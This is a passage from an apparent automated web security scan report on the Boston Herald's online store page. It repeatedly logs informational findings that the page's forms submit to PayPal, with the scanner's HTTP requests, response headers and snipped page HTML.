<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img height="167" src="images/Oct312007.jpg" align"right">

<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

7.4. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune6.gif">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

7.5. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune18c.gif">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

7.6. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
</p>
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="hidden" name="cmd" value="_cart">
...[SNIP]...

7.7. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune20.gif" width="104" height="171">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

7.8. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/images/siteImages/universal/championsBuyNow.gif">
Champions: A Herald Media 64-page full color publication
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

7.9. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<br>
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

7.10. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jan212009.gif" width="104" height="105">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

7.11. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jan202009.gif" width="104" height="106">
<form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_blank">
<input name="cmd" value="_s-xclick" type="hidden">
...[SNIP]...

7.12. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img height="167" src="http://bh.heraldinteractive.com/store/images/superSweet.jpg">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="Make payments with PayPal - it's fast, free and secure!">
...[SNIP]...

7.13. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jan222009.gif" width="104" height="111">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

7.14. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune19.gif">


<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

7.15. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsSS.gif">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

7.16. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://cache.heraldinteractive.com/store/images/Jul070809.gif" width="104" height="111">
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">
<input type="hidden" name="cmd" value="_s-xclick">
...[SNIP]...

7.17. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /store/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 09:35:08 GMT
Server: Apache
Last-Modified: Fri, 16 Jul 2010 15:55:00 GMT
Accept-Ranges: bytes
Content-Length: 45244
Content-Type: text/html; charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <title>BostonHerald.com</title>
   <
...[SNIP]...
<img src="http://bh.heraldinteractive.com/store/images/CelticsFrontpagejune13.gif">
   
<form target="paypal" action="https://www.paypal.com/cgi-bin/webscr" method="post">

<input type="image" src="https://www.paypal.com/en_US/i/btn/btn_cart_SM.gif" border="0" name="submit" alt="PayPal - The safer, easier way to pay online!">
...[SNIP]...

7.18. http://bostonherald.com/store/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /store/

Issue detail

